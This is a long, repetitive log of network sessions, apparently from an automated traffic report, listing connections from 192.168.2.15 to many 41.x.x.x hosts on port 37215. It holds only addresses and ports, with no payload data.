                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21966192.168.2.155987441.16.58.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21967192.168.2.153445841.202.189.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21968192.168.2.153975241.184.79.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21969192.168.2.153960841.105.17.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21970192.168.2.155093641.92.37.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21971192.168.2.153600641.251.12.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21972192.168.2.155248641.3.254.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21973192.168.2.154619841.176.234.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21974192.168.2.155894241.235.118.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21975192.168.2.155393441.7.213.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21976192.168.2.153415641.90.129.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21977192.168.2.154237041.46.205.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21978192.168.2.153825441.78.170.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21979192.168.2.155744841.128.180.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21980192.168.2.153370641.137.183.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21981192.168.2.153865441.158.52.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21982192.168.2.155021841.148.58.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21983192.168.2.153360641.219.6.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21984192.168.2.154556241.202.63.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21985192.168.2.154731441.24.19.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21986192.168.2.153307241.91.125.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21987192.168.2.154723441.75.244.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21988192.168.2.153335241.255.234.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21989192.168.2.156008841.88.6.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21990192.168.2.153803041.142.74.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21991192.168.2.155188841.182.167.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21992192.168.2.153407441.213.249.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21993192.168.2.153459241.20.184.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21994192.168.2.155772841.77.120.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21995192.168.2.155378041.49.138.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21996192.168.2.153631041.140.242.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21997192.168.2.154584841.220.37.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21998192.168.2.155606241.221.79.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21999192.168.2.156026641.186.102.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22000192.168.2.154315241.126.47.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22001192.168.2.154586841.217.222.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22002192.168.2.153674241.86.96.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22003192.168.2.155003441.10.164.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22004192.168.2.153602441.60.120.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22005192.168.2.153783241.81.131.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22006192.168.2.154900641.74.228.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22007192.168.2.154315441.174.39.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22008192.168.2.156011641.187.65.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22009192.168.2.154654641.138.101.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22010192.168.2.155571841.169.250.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22011192.168.2.154690241.53.236.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22012192.168.2.154758241.64.127.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22013192.168.2.154831041.168.204.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22014192.168.2.155440841.253.194.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22015192.168.2.154428241.223.114.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22016192.168.2.155719441.234.178.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22017192.168.2.155417441.169.18.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22018192.168.2.155218241.57.73.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22019192.168.2.155310841.24.37.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22020192.168.2.156040041.233.154.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22021192.168.2.154090841.147.79.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22022192.168.2.154282441.248.47.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22023192.168.2.155871841.164.40.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22024192.168.2.153839641.184.68.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22025192.168.2.154469641.254.159.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22026192.168.2.153943841.203.125.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22027192.168.2.153690841.50.170.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22028192.168.2.153781441.88.174.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22029192.168.2.155359641.236.162.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22030192.168.2.155582241.109.135.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22031192.168.2.155519641.93.173.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22032192.168.2.155368041.72.182.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22033192.168.2.154898241.70.251.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22034192.168.2.154847241.245.148.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22035192.168.2.154357841.72.225.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22036192.168.2.155210641.25.126.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22037192.168.2.154582441.155.6.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22038192.168.2.155601041.107.54.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22039192.168.2.155541041.118.158.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22040192.168.2.155445441.11.82.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22041192.168.2.155608841.235.163.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22042192.168.2.154741441.100.7.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22043192.168.2.154241841.139.204.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22044192.168.2.153946041.131.215.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22045192.168.2.154840241.117.144.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22046192.168.2.154097241.212.83.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22047192.168.2.155319041.186.0.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22048192.168.2.155501441.151.230.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22049192.168.2.155805241.239.203.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22050192.168.2.155902041.166.128.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22051192.168.2.154159041.11.44.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22052192.168.2.155657241.161.223.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22053192.168.2.155666241.240.105.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22054192.168.2.154980841.217.216.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22055192.168.2.153770441.154.176.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22056192.168.2.154883441.223.229.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22057192.168.2.155339441.237.33.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22058192.168.2.154431441.11.168.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22059192.168.2.154736641.205.66.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22060192.168.2.155561041.148.236.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22061192.168.2.155429041.194.195.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22062192.168.2.155280241.157.47.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22063192.168.2.155673041.222.40.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22064192.168.2.155144241.63.2.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22065192.168.2.153597441.210.30.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22066192.168.2.155716441.183.126.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22067192.168.2.155717641.195.195.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22068192.168.2.153666441.246.41.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22069192.168.2.153457841.182.172.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22070192.168.2.155488041.83.36.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22071192.168.2.153949041.192.220.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22072192.168.2.154643841.196.231.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22073192.168.2.153554441.222.140.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22074192.168.2.153970041.100.225.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22075192.168.2.155001041.43.151.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22076192.168.2.153878841.168.48.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22077192.168.2.155721641.166.50.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22078192.168.2.155039641.220.242.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22079192.168.2.156051241.160.168.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22080192.168.2.155373241.221.197.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22081192.168.2.154773441.205.99.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22082192.168.2.155512041.114.203.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22083192.168.2.155522441.21.118.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22084192.168.2.155475841.78.107.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22085192.168.2.153813441.82.145.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22086192.168.2.156020041.93.43.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22087192.168.2.153498641.191.204.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22088192.168.2.155305041.96.98.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22089192.168.2.155554041.225.124.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22090192.168.2.153341841.22.247.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22091192.168.2.154458841.108.214.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22092192.168.2.155711441.104.208.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22093192.168.2.154620241.92.248.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22094192.168.2.154892441.211.204.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22095192.168.2.154700841.119.120.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22096192.168.2.153509041.114.52.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22097192.168.2.155300441.13.7.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22098192.168.2.155569241.46.159.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22099192.168.2.154155241.173.61.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22100192.168.2.154769441.174.230.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22101192.168.2.155635641.234.87.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22102192.168.2.155052441.187.103.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22103192.168.2.153609041.99.101.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22104192.168.2.153313441.133.28.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22105192.168.2.155058641.158.183.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22106192.168.2.154409641.231.51.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22107192.168.2.155995041.104.253.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22108192.168.2.155271041.93.151.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22109192.168.2.155362241.50.183.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22110192.168.2.154405041.84.87.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22111192.168.2.153730641.81.131.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22112192.168.2.155804441.24.58.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22113192.168.2.154022441.117.18.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22114192.168.2.155397641.222.212.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22115192.168.2.153697641.32.246.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22116192.168.2.155902441.88.186.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22117192.168.2.155081441.146.32.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22118192.168.2.155330841.214.164.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22119192.168.2.155583241.14.24.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22120192.168.2.154120441.106.89.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22121192.168.2.155780041.243.139.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22122192.168.2.153364241.29.118.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22123192.168.2.155600441.208.27.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22124192.168.2.154983241.112.159.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22125192.168.2.153896641.245.40.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22126192.168.2.155739841.157.148.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22127192.168.2.155034641.227.69.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22128192.168.2.155383841.105.217.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22129192.168.2.154754641.147.158.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22130192.168.2.154013241.190.163.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22131192.168.2.154112241.223.15.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22132192.168.2.154736241.235.109.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22133192.168.2.154638841.130.199.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22134192.168.2.153385841.180.102.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22135192.168.2.155301441.249.232.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22136192.168.2.153750041.91.214.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22137192.168.2.155334841.46.240.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22138192.168.2.153424041.153.70.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22139192.168.2.153993241.149.43.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22140192.168.2.153521241.147.252.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22141192.168.2.154975441.63.221.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22142192.168.2.154813441.108.96.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22143192.168.2.153420241.43.168.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22144192.168.2.154104041.72.66.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22145192.168.2.153604641.206.176.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22146192.168.2.155557641.110.65.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22147192.168.2.155407041.11.126.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22148192.168.2.153611841.175.37.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22149192.168.2.153932641.84.98.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22150192.168.2.154410041.153.213.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22151192.168.2.153930641.32.188.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22152192.168.2.155649041.233.106.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22153192.168.2.153316441.146.57.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22154192.168.2.155318841.160.170.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22155192.168.2.155262441.30.109.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22156192.168.2.155125041.169.26.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22157192.168.2.155517641.222.200.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22158192.168.2.154028841.250.32.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22159192.168.2.154514641.42.221.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22160192.168.2.154469841.122.140.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22161192.168.2.154969041.96.211.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22162192.168.2.154404241.151.218.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22163192.168.2.154030041.69.220.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22164192.168.2.155037641.231.137.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22165192.168.2.153400441.37.33.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22166192.168.2.155583241.105.232.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22167192.168.2.155489441.179.71.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22168192.168.2.155399041.105.102.14437215
